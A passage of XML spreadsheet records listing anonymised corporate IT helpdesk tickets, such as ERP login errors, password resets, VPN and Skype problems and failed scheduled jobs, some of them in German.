    <s v="fmzdkyqv dbrslnhe"/>
    <x v="23"/>
  </r>
  <r>
    <s v="not able to apply job in company portal in : external user "/>
    <s v="not able to apply job in company portal in : external user "/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="working from home, connection to vpn gets disconnected"/>
    <s v="i continue to get disconnected from vpn and have to reconnect multiple times a day"/>
    <s v="gtfdvnry nxsaqrfh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset password user zigioachstyac- SID_1"/>
    <s v="reset password user zigioachstyac- SID_1"/>
    <s v="jaeuqbvt orlhenfj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="procenter login credential for new joiners"/>
    <s v="please create procenter login credential for below new joiners._x000a__x000a_name:vijghyduhprga yeghrrajghodu_x000a_user id:yerrav _x000a_---------------------------------------------------_x000a_name:ulezhxfw kslocjtaaruthapandian_x000a_user id:karhjuyutk_x000a__x000a_"/>
    <s v="jloygrwh acvztedi"/>
    <x v="36"/>
  </r>
  <r>
    <s v="how to add members to distribution groups"/>
    <s v="how to add members to distribution groups"/>
    <s v="muywpnof prtikusy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype issues"/>
    <s v="_x000d__x000a__x000d__x000a_received from: wauhocsk.vxuikqaf@gmail.com_x000d__x000a__x000d__x000a_hallo my friends_x000d__x000a__x000d__x000a_i have changed password today. there was no &quot;problem&quot; message coming out after the password change. everything was gtehdnyu and saying ok â€“ password successfully changed_x000d__x000a__x000d__x000a_now from some reasons i am not able to log in to skype for business. it is showing me following_x000d__x000a__x000d__x000a_please let me know what should i do_x000d__x000a__x000d__x000a_"/>
    <s v="wauhocsk vxuikqaf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="call from vitalyst : error : no sections to display. note that section in a group aren't supported. one note issue "/>
    <s v="error : no sections to display. note that section in a group aren't supported."/>
    <s v="xfdkwusj gyklresa"/>
    <x v="22"/>
  </r>
  <r>
    <s v="re: ticket_no1551649: change ansi and iso no."/>
    <s v="_x000d__x000a__x000d__x000a_received from: stdiondwd.rawdwu@company.com_x000d__x000a__x000d__x000a_closed the ticket!_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="kmnsvzuq euyvihzc"/>
    <x v="19"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0439844"/>
    <s v="spam mails coming in to the inbox"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="aw: ticket_no1551649: change ansi and iso no."/>
    <s v="_x000a__x000a_received from: cbupnjzo.daflthkw@gmail.com_x000a__x000a_hello sudghhahjkkar,_x000a_would you please close this ticket._x000a_at this moment i tried to change the ansi and iso no. and it worked very well._x000a__x000a_please excuse the inconvenience and "/>
    <s v="cbupnjzo daflthkw"/>
    <x v="19"/>
  </r>
  <r>
    <s v="change in ethics"/>
    <s v="_x000d__x000a__x000d__x000a_received from: lhejbwkc.xbmyvnqf@gmail.com_x000d__x000a__x000d__x000a_dear all_x000d__x000a__x000d__x000a_had a change from company to company e-mail seems that this is now creating problems with our ethnics site:_x000d__x000a__x000d__x000a_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_x000a__x000d__x000a_please make sure that i can access again._x000d__x000a__x000d__x000a_"/>
    <s v="lhejbwkc xbmyvnqf"/>
    <x v="19"/>
  </r>
  <r>
    <s v="outlook not launching"/>
    <s v="outlook not launching"/>
    <s v="vitpjxgm zxiqkrns"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to submit the time card"/>
    <s v="hi team,_x000d__x000a__x000d__x000a_i am unable to submit the time card(attached is the screenshot). can you please help. "/>
    <s v="wczegmok bgqoclvs"/>
    <x v="35"/>
  </r>
  <r>
    <s v="outlook not updating"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ivdntecr.cdasfpjb@gmail.com_x000d__x000a__x000d__x000a_please see below error. my outlook is not updating and it is saying my password is wrong or won't connect to server. when i open the outlook programdnty i am asked to enter my credentials, but after doing so the server will not connect. i am currently using the web-based version of outlook on internet explorer._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:0abb054c-e7fe-4304-aeea-287a1733a874]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="ivdntecr cdasfpjb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="rrc email boxes"/>
    <s v="_x000a__x000a_received from: iauqlrjk.nijdaukz@gmail.com_x000a__x000a_good morning,_x000a__x000a_i need to be added to a couple email boxes so i have access, can you please assist?_x000a__x000a__x000a_                estfhycoastrrc@company.com&lt;mailto:estfhycoastrrc@company.com&gt;_x000a__x000a_                estfhycoastrrc@company.com&lt;mailto:estfhycoastrrc@company.com&gt;_x000a__x000a_also muywpnof prtikusy is requesting to be the owner of these email addresses so he can add people to them when needed, is this possible?_x000a_"/>
    <s v="iauqlrjk nijdaukz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn query "/>
    <s v="vpn query "/>
    <s v="vfrdxtqw jfbmsenz"/>
    <x v="33"/>
  </r>
  <r>
    <s v="network outage : israel, israel ( sales facility) is down on 09/13 at 8:23 am et. "/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _____no____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______09/13 at 8:23 am et___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no___    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   _____no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no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unable to log in to windows "/>
    <s v="unable to log in to windows "/>
    <s v="ohnimgtv nmqyuolh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="connect or share collaboration_platform from pc to collaboration_platform through company hub"/>
    <s v="hello it personnel,_x000d__x000a__x000d__x000a_i have used collaboration_platform 2013 saved to the local computer drive.  i would like to connect my local collaboration_platform to the collaboration_platform accessed through the office software on collaboration_platform (company's hub).  how do i connect the two locations?_x000d__x000a__x000d__x000a_best "/>
    <s v="pkfvoucw yhmicuba"/>
    <x v="15"/>
  </r>
  <r>
    <s v="account locked out."/>
    <s v="account locked out."/>
    <s v="ohnimgtv nmqyuolh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wichtig: bitte netzwerke synchronisieren !!"/>
    <s v="_x000a__x000a_received from: nhsogrwy.qkxhbnvp@gmail.com_x000a__x000a_hallo herr dwfiykeo argtxmvcumar,_x000a_hallo it help team,_x000a__x000a_kÃ¶nnen sie bitte diese beiden netzwerke synchronisieren =&gt; sie mÃ¼ssen identisch sein!!!_x000a__x000a_aktuell stimmen die daten nicht Ã¼berein._x000a__x000a_[cid:image001.png@01d20f62.ebe809f0]_x000a__x000a_vorab vielen dank!_x000a__x000a_mit freundlichen grÃ¼ÃŸen_x000a__x000a_mafghyrina gÃ¼ntner_x000a_specialist hr shared services_x000a_nhsogrwy.qkxhbnvp@gmail.com&lt;mailto:lixwgnto.krutnylz@gmail.com&gt;_x000a_company shared services gmbh_x000a_geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx, naruedlk mpvhakdq_x000a__x000a__x000a__x000a__x000a_"/>
    <s v="wacxhqvs nxdythgc"/>
    <x v="11"/>
  </r>
  <r>
    <s v="reset the password for tfsehruw dzrgpkyn on erp / produktion / erp"/>
    <s v="reset the password for tfsehruw dzrgpkyn on erp / produktion / erp"/>
    <s v="tfsehruw dzrgpkyn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="call for ecwtrjnq jpecxuty"/>
    <s v="call for ecwtrjnq jpecxuty"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="interface: gigabitethernet1/0/47 Â· mtb gf wirelss ap on company-ap-ind-kirty-pu9-ff-2960s-stack-sw01.company.com is down "/>
    <s v="interface: gigabitethernet1/0/47 Â· mtb gf wirelss ap on company-ap-ind-kirty-pu9-ff-2960s-stack-sw01.company.com is down "/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="3"/>
  </r>
  <r>
    <s v="skype - poor quality"/>
    <s v="_x000a__x000a_received from: azxhejvq.fyemlavd@gmail.com_x000a__x000a_please open a ticket for me.  i have been on a few skype calls recently where the quality was very poor.  these calls were multinational with india or apac with participants in the us.  the audio quality was so poor that we could not understand each other to the point that the meeting was almost a waste of time.  also, the ability to broadcast powerpoint or erp screen images was bas as well were some of the participants of the meeting could not see the content again making the meetings a waste of our time._x000a__x000a_mikhghytr wafglhdrhjop_x000a_sr. manager, global ethics and compliance programdntys_x000a__x000a__x000a__x000a__x000a_"/>
    <s v="azxhejvq fyemlavd"/>
    <x v="26"/>
  </r>
  <r>
    <s v="cannot log onto telephony_software"/>
    <s v="cannot log onto telephony_software_x000a__x000a_error message : authentication process failed_x000a__x000a_telephone: "/>
    <s v="lwbchnga axpqctfr"/>
    <x v="6"/>
  </r>
  <r>
    <s v="laptop needs to be formatheywted"/>
    <s v="from: sagfhosh karhtyiio _x000a_sent: thursday, september 15, 2016 6:00 am_x000a_to: hgwofcbx tnowikyv; gmrkisxy wgtcylir_x000a_cc: sridthshar herytur; ufpzergq zchjbfdehivashankaraiah_x000a_subject: re: it asset_x000a__x000a_hi ghkkytu,_x000a__x000a_as discussed please format the laptop this needs to be given to the new joiner vijuryat dgurhtya._x000a__x000a_i have assigned inc1551683 to your team for the same._x000a__x000a_"/>
    <s v="jloygrwh acvztedi"/>
    <x v="18"/>
  </r>
  <r>
    <s v="cannot connect to outlook or connect to exchange for skype, also have issue with com add in for excel"/>
    <s v=" repeat of same issue that i have had in the past. not able to connect to outlook. also, com add in is not staying available on excel file, i have to reselect it each time i open the file."/>
    <s v="ymorvuwg pejkzvfl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="@5c\qerror@ 35019921rder# 35019921, material 7393495  "/>
    <s v="@5c\qerror@ 3501992sartlgeo lhqksbdx0 &quot;create delivery&quot; not allowed (sys. status exls, object vb0035019921000010) @35\qlong text exists@ need to  create a delivery_x000d__x000a_"/>
    <s v="schyepwd ykatfphc"/>
    <x v="12"/>
  </r>
  <r>
    <s v="can't log onto skype. changed password yesterday, won't recognize today"/>
    <s v="can't log onto skype. changed password yesterday, won't recognize today"/>
    <s v="xmiroedk vreqdcpw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no folder access"/>
    <s v="_x000d__x000a__x000d__x000a_received from: nhsogrwy.qkxhbnvp@gmail.com_x000d__x000a__x000d__x000a_team,_x000d__x000a_[cid:image001.png@01d20f3c.cb611f80]   is not working._x000d__x000a__x000d__x000a_please usa access for me._x000d__x000a__x000d__x000a_"/>
    <s v="wacxhqvs nxdythgc"/>
    <x v="33"/>
  </r>
  <r>
    <s v="printer problem / issue information - reroute rn33 back."/>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_x000d__x000a_ _x000d__x000a_   â€¢  detailed description of the problem ?   reroute rn33 back erp / has been fixed._x000d__x000a__x000d__x000a_   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) _x000d__x000a_      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc)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yfmaqovp wdonhbez"/>
    <x v="4"/>
  </r>
  <r>
    <s v="instalar docad eletronico"/>
    <s v="user: olghiveii_x000d__x000a__x000d__x000a_segue link_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="lokiwfhg udkoqrcg"/>
    <x v="62"/>
  </r>
  <r>
    <s v="it  -  speker for skype conferences"/>
    <s v="it - germany:_x000d__x000a__x000d__x000a_skype speakers are required for confernece room 1 an the conference room behind the cantine._x000d__x000a_therefore michghytuael hÃ¤cker confirmed to purchase the new two speakers._x000d__x000a_xvwchsdg pladjmxt suggested to go with one bigger speaker instead._x000d__x000a_please check the prices to allow michghytuael to compare both possibilities._x000d__x000a__x000d__x000a_"/>
    <s v="atlwdyej vtlhzbix"/>
    <x v="32"/>
  </r>
  <r>
    <s v="user safghghga needs to reset her password"/>
    <s v="hello! could you pls help me and create a new password for user id: safghghga (gabryltka sabhtyhiko)?_x000a_she blocked her computer and now she needs to access aerp._x000a_please, contact me when you have done it._x000a_"/>
    <s v="mtgvfzwc cdabfghv"/>
    <x v="19"/>
  </r>
  <r>
    <s v="problem with crm leads"/>
    <s v="_x000a__x000a_received from: vkzwafuh.tcjnuswg@gmail.com_x000a__x000a_hi,_x000a_when i received a lead i tried to convert it into an opportstorage_product by qualifying it. when i did that i got an error. see below. please advise._x000a__x000a_[cid:image001.jpg@01d20f1e.cd84e580]_x000a__x000a_vkzwafuh tcjnuswg - cmp_x000a_sr. application eng._x000a_vkzwafuh.tcjnuswg@gmail.com_x000a__x000a__x000a__x000a__x000a__x000a_"/>
    <s v="vkzwafuh tcjnuswg"/>
    <x v="14"/>
  </r>
  <r>
    <s v="company iphone device activation"/>
    <s v="company iphone device activation"/>
    <s v="rwiykpuc ckrmjqlx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip2: unable to get on the network"/>
    <s v="vip2: unable to get on the network"/>
    <s v="vkjdgtxb pkinmjqs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="printer rj0c on printer server HostName_1033 is not right for x64"/>
    <s v="printer adds to pc fine but when trying to print continuously prints characters and symbols and that's it. when used on a x86 pc from server HostName_769 it prints fine._x000d__x000a_printer is a laserjet 5si mx_x000d__x000a__x000d__x000a_tim komar looked at this"/>
    <s v="bzxljkoy rvoiqthl"/>
    <x v="11"/>
  </r>
  <r>
    <s v="can not get erp to issue deliveries for 4 sto's - truck scheduled to pick up at 10:00am today"/>
    <s v="stock is available in erp but apparently not apo.  please help to issue deliveries for  5019229515, 5019229528, 5019229548 &amp; 5019229566 to return scrap powder to powder plants."/>
    <s v="aeiljfxg hzwxtyjr"/>
    <x v="5"/>
  </r>
  <r>
    <s v="the fitness center digital signage pc will not connect to the network to get updates."/>
    <s v="the fitness center digital signage pc will not connect to the network to get updates."/>
    <s v="cwuospin nbhoxqpe"/>
    <x v="2"/>
  </r>
  <r>
    <s v="unable to logon to erp"/>
    <s v="unable to logon to erp"/>
    <s v="ijplstng juybetlo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_37hotf failed in job_scheduler at: 09/15/2016 07:40:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_37hotf failed in job_scheduler at: 09/15/2016 07:40:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="reset password user zigioachstyac - SID_34 /SID_37"/>
    <s v="reset password user zigioachstyac - SID_34/SID_37"/>
    <s v="jaeuqbvt orlhenfj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wg: zeichnung 5685567645"/>
    <s v="_x000a__x000a_received from: dnwfhpyl.zqbldipk@gmail.com_x000a__x000a_von: vgsqetbx wpkcbtjl_x000a_gesendet: donnerstag, 15. september 2016 10:41_x000a_an: dnwfhpyl zqbldipk &lt;dnwfhpyl.zqbldipk@gmail.com&gt;_x000a_betreff: zeichnung 5685567645_x000a__x000a__x000a__x000a_hallo,_x000a_ich habe wieder eine zeichnung 5685645 mit falsch aufgedruckter zeichnungsnummer bitte richtigstellen_x000a__x000a__x000a_mit freundlichen grÃ¼ÃŸen_x000a__x000a_vgsqetbx wpkcbtjl_x000a_production planner_x000a_company produktions gmbh &amp; co. kg_x000a_vgsqetbx.wpkcbtjl@gmail.com&lt;mailto:vgsqetbx.wpkcbtjl@gmail.com&gt;_x000a__x000a_geschÃ¤ftsfÃ¼hrer: dr. jofghyuach fabry, harald mÃ¤nnlein, rtnzvplq erhmuncq_x000a__x000a_von: dnwfhpyl zqbldipk_x000a_gesendet: dienstag, 16. april 2013 09:50_x000a_an: tfhzidnq wqpfdobe_x000a_cc: vgsqetbx wpkcbtjl; ksvqzmre yqnajdwh_x000a_betreff: aw: erp-plm: drawing with different drawing number_x000a__x000a_hallo heighjtyich,_x000a__x000a_ich bitte um entschuldigung wegen der falschen gdw drawing #. ein paar zeichnungen wurden 10 monate vor dem plm go-live versehentlich ein zweites mal umbenannt, nachdem sie schon konvertiert waren. die richtige plm nummer ist immer die rechts oben im druckstempel._x000a__x000a_auch das viele eurer gescannten zeichnungen nictafvwlpz opfigqramdntyatisch nach pdf konvertiert werden konnten tut mir leid. es wurden &gt; 2.600.000 zeichnungen konvertiert und etwa 4000 davon machten probleme. ein paar hundert davon scheinen von euch zu sein. wir reparieren diese wie bisher bei bedarf._x000a__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="dnwfhpyl zqbldipk"/>
    <x v="10"/>
  </r>
  <r>
    <s v="not able to access email"/>
    <s v="not able to access email._x000d__x000a__x000d__x000a_itclukpe aimcfeko is his manager"/>
    <s v="adlkywmc knzbuowr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="ehoxaltv ripteyxl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_47arc2 failed in job_scheduler at: 09/15/2016 06:35:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_47arc2 failed in job_scheduler at: 09/15/2016 06:35:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_48arc1 failed in job_scheduler at: 09/15/2016 06:28:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_48arc1 failed in job_scheduler at: 09/15/2016 06:28:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_48arc2 failed in job_scheduler at: 09/15/2016 06:21:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_48arc2 failed in job_scheduler at: 09/15/2016 06:21:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_35arc2 failed in job_scheduler at: 09/15/2016 06:21:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_35arc2 failed in job_scheduler at: 09/15/2016 06:21:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="vpn doesnt check for antivirus or company domain while connecting from outside network"/>
    <s v="refer screenshot"/>
    <s v="akisjtzm uvbmysgc"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job SID_37hotf failed in job_scheduler at: 09/15/2016 06:14:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_37hotf failed in job_scheduler at: 09/15/2016 06:14:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="system disk c: of server HostName_698 is full again"/>
    <s v="_x000d__x000a__x000d__x000a_received from: fbyusmxz.kxvmcbly@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_system disk c: of server HostName_698 is full again â€“ please check._x000d__x000a_we had the same issue 3 weeks ago (ticket inc1543749)_x000d__x000a_it is the virtual center server._x000d__x000a_"/>
    <s v="fbyusmxz kxvmcbly"/>
    <x v="11"/>
  </r>
  <r>
    <s v="reporting_tool: issues with daily sales and orders report."/>
    <s v="_x000a__x000a_received from: plfwoagd.chtpiazu@gmail.com_x000a__x000a_no reply from panjkytr._x000a__x000a_please create a case._x000a__x000a_what we need is a possibility to subscribe to a dedicated  daily sales and orders report and to receive the mti data per email instead of the total industrial results (consisting of the combined results of tooling and mti)._x000a__x000a__x000a_mit freundlichen grugermany / best "/>
    <s v="plfwoagd chtpiazu"/>
    <x v="8"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="dbhwzfxy amhowrfk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mr tmqfjard qzhgdoua, ordinary no. 100937, requires full access to the following EU_tool- modules:"/>
    <s v="fyi_x000a__x000a_von: axesnghb cyzuomxa _x000a_gesendet: donnerstag, 15. september 2016 10:19_x000a_an: ughzilfm cfibdamq_x000a_cc: tmqfjard qzhgdoua_x000a_betreff: tmqfjard qzhgdoua : berechtigung fÃ¼r EU_tool- module_x000a__x000a__x000a_hallo herr bghakch,_x000a__x000a__x000a_herr tmqfjard qzhgdoua, stamm- nr. 100937,   benÃ¶tigt vollen zugriff auf folgende EU_tool- module :_x000a__x000a_chargenverwaltung_x000a__x000a_pulverleitstand_x000a__x000a__x000a__x000a__x000a_mit freundlichen grÃ¼ÃŸen_x000a__x000a_ preuÃŸ_x000a_supervisor rod production germany_x000a_axesnghb.cyzuomxa@gmail.com_x000a__x000a_geschÃ¤ftsfÃ¼hrer/managing directors: phvkowml azbtkqwx, naruedlk mpvhakdq_x000a_sitz/registered office: germany _x000a__x000a_persÃ¶nlich haftende gesellschafterin/general partner: company gmbh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s v="tmqfjard qzhgdoua"/>
    <x v="58"/>
  </r>
  <r>
    <s v="application response time (other network resources work normally)"/>
    <s v="while trying to ship product to usa, i am not getting a put-away ticket. the system is taking an estorage_productly long time to process the transaction, and i am getting an error stating that the update was terminated._x000a_site / location : company usa, ohio_x000a_user id (ad) : lilesfhpk_x000a_system you are seeing performance problems on (please list all) (e.g., crm, erp, bw, bobj): erp SID_34_x000a_transactions that are slow (e.g., va01, create an order): md04_x000a_area this belongs to (e.g., sales, finance, markhtyeting etc.): production_x000a_how can this issue be replicated by the it support group:_x000a_are other users seeing this? not sure_x000a_please attach relevant screenshots and exact times when the issue occurred: _x000a_"/>
    <s v="jyrzqhgt xwasiehc"/>
    <x v="17"/>
  </r>
  <r>
    <s v="request for mobile email access"/>
    <s v="_x000d__x000a__x000d__x000a_received from: luxdnsvk.qmnyzcfs@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a__x000d__x000a_attached is the filled wireless mobility policy sheet with my manager approval._x000d__x000a_kindly enable email access to my mobile._x000d__x000a_kindly contact me for any information required in this regard._x000d__x000a__x000d__x000a_with best "/>
    <s v="luxdnsvk qmnyzcfs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2645 failed in job_scheduler at: 09/15/2016 03:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2645 failed in job_scheduler at: 09/15/2016 03:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <e v="#NAME?"/>
    <s v="_x000d__x000a__x000d__x000a_received from: eqmuniov.ehxkcbgj@gmail.com_x000d__x000a__x000d__x000a_good morning,_x000d__x000a__x000d__x000a_when  trying to log on to erp i get this error below._x000d__x000a_please help  urgently as i can not process customer order._x000d__x000a__x000d__x000a_[cid:image001.png@01d20f2e.751db880]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="eqmuniov ehxkcbgj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="computer gets hot"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ucphibmr.dfvkbtsj@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_my computer is hot and the fan runs all the time so you can hear it._x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="ucphibmr dfvkbtsj"/>
    <x v="28"/>
  </r>
  <r>
    <s v="kabel vga tauschen \jionmpsf wnkpzcmv"/>
    <s v="kabel vga tauschen \jionmpsf wnkpzcmv"/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="monitor defekt"/>
    <s v="hallo ,_x000d__x000a__x000d__x000a_der monitor von ahmet gÃ¶k im materiallager macht probleme. _x000d__x000a_kannst du dir das bitte anschauen._x000d__x000a_"/>
    <s v="vaigycet jtgmpdcr"/>
    <x v="24"/>
  </r>
  <r>
    <s v="install pulverleitstand \tmqfjard qzhgdoua"/>
    <s v="install pulverleitstand \tmqfjard qzhgdoua"/>
    <s v="tmqfjard qzhgdoua"/>
    <x v="24"/>
  </r>
  <r>
    <s v="falsche formatierung in pdf \bfqnvezs vwkasnxe"/>
    <s v="falsche formatierung in pdf \bfqnvezs vwkasnxe"/>
    <s v="bfqnvezs vwkasnxe"/>
    <x v="24"/>
  </r>
  <r>
    <s v="install pulverleitstand \vaigycet jtgmpdcr"/>
    <s v="install pulverleitstand \vaigycet jtgmpdcr"/>
    <s v="vaigycet jtgmpdcr"/>
    <x v="24"/>
  </r>
  <r>
    <s v="job Job_1338 failed in job_scheduler at: 09/15/2016 02:46:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1338 failed in job_scheduler at: 09/15/2016 02:46:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="crm complaint no.7611183893 - it ticket required"/>
    <s v="_x000d__x000a__x000d__x000a_received from: wiypaqtu.lmgqbpvi@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_please raise it ticket on behalf of me for crm complaint no.7611183893 having error and it's not archived to ecc 6_x000d__x000a__x000d__x000a__x000d__x000a_with best "/>
    <s v="wiypaqtu lmgqbpvi"/>
    <x v="14"/>
  </r>
  <r>
    <s v="login failure  -  erp user nieghjyukea"/>
    <s v="_x000d__x000a__x000d__x000a_received from: bwvrncih.ibuyfrcq@gmail.com_x000d__x000a__x000d__x000a_good morning team_x000d__x000a__x000d__x000a_i have a problem login into erp, please can you assist?_x000d__x000a__x000d__x000a_kind "/>
    <s v="bwvrncih ibuyfrcq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp-engineering tool"/>
    <s v="_x000a__x000a_received from: bqapjkcl.ljeakcqf@gmail.com_x000a__x000a_please reset my password in erp-engineering tool._x000a__x000a_dipl.-ing.(ba) bqapjkcl ljeakcqf_x000a_bqapjkcl.ljeakcqf@gmail.com&lt;mailto:bqapjkcl.ljeakcqf@gmail.com&gt;_x000a__x000a__x000a_company shared services gmbh_x000a_managing directors/geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx, naruedlk mpvhakdq_x000a_"/>
    <s v="bqapjkcl ljeakcqf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reenable erp SID_34 account for vvaghjnthl - same as that of henghl"/>
    <s v="_x000a__x000a_received from: rxoynvgi.ntgdsehl@gmail.com_x000a__x000a_hi it team_x000a__x000a_kindly please assist to reset SID_34 password for user: vvaghjnthl._x000a__x000a_hydstheud mddwwyleh_x000a_operation supervisor_x000a_company distribution services of asia pte ltd_x000a__x000a_email : rxoynvgi.ntgdsehl@gmail.com&lt;mailto:rxoynvgi.ntgdsehl@gmail.com&gt;"/>
    <s v="rxoynvgi ntgdsehl"/>
    <x v="19"/>
  </r>
  <r>
    <s v="logon balancing error"/>
    <s v="_x000d__x000a__x000d__x000a_received from: wrelsfqa.qfwosjkh@gmail.com_x000d__x000a__x000d__x000a_good morning_x000d__x000a__x000d__x000a_please help. a few of us the south africa office in south africa cannot log into erp. we are all getting &quot; log on balancing error 88&quot;. it looks like the diginet line is down. it is not effecting everyone._x000d__x000a__x000d__x000a_kind "/>
    <s v="wrelsfqa qfwosjkh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="username: mabelteghj erp logon"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gkerqucv.bqumyrea@gmail.com_x000d__x000a__x000d__x000a_good morning,_x000d__x000a__x000d__x000a_i am not able to log in erp, kindly assist._x000d__x000a__x000d__x000a_kind "/>
    <s v="gkerqucv bqumyrea"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp system"/>
    <s v="_x000a__x000a_received from: iksqbuxf.muzxgwvk@gmail.com_x000a__x000a_morning_x000a_please help syghmesa i can not lock in to erp i did do a shutdown on my computer  still not_x000a_please please help us at company south africa_x000a_"/>
    <s v="iksqbuxf muzxgwvk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vtzhelgs.ivewqogm@gmail.com_x000d__x000a__x000d__x000a_good morning,_x000d__x000a__x000d__x000a_can you please assist as i cannot log into erp. i receive the following error;_x000d__x000a__x000d__x000a_[cid:image001.png@01d20f27.6d462360]_x000d__x000a__x000d__x000a_"/>
    <s v="vtzhelgs ivewqogm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="re; erp"/>
    <s v="_x000d__x000a__x000d__x000a_received from: btyvqhjw.xbyolhsw@gmail.com_x000d__x000a__x000d__x000a_good day_x000d__x000a__x000d__x000a_trust you are well_x000d__x000a_please can you help cant lock in to erp give me the 88 code_x000d__x000a__x000d__x000a_"/>
    <s v="zvenmiap kocjpnle"/>
    <x v="0"/>
  </r>
  <r>
    <s v="an terminal 12 bei iso-u kÃ¶nnen im EU_tool keine zeichnungen mehr aufgerufen werden!!"/>
    <s v="an terminal 12 bei iso-u kÃ¶nnen im EU_tool keine zeichnungen mehr aufgerufen werden!! diese funktion wird wegen der auftragsbereitstellung benÃ¶tigt!!!!"/>
    <s v="tiefszyh sfujdlgv"/>
    <x v="41"/>
  </r>
  <r>
    <s v=" bobj error "/>
    <s v="issue while refreshing the global spend analytics v2 report in bobj"/>
    <s v="ginjmaxk zumkvfeb"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job bkwin_tax_interface_qa_daily failed in job_scheduler at: 09/15/2016 00:23:00  "/>
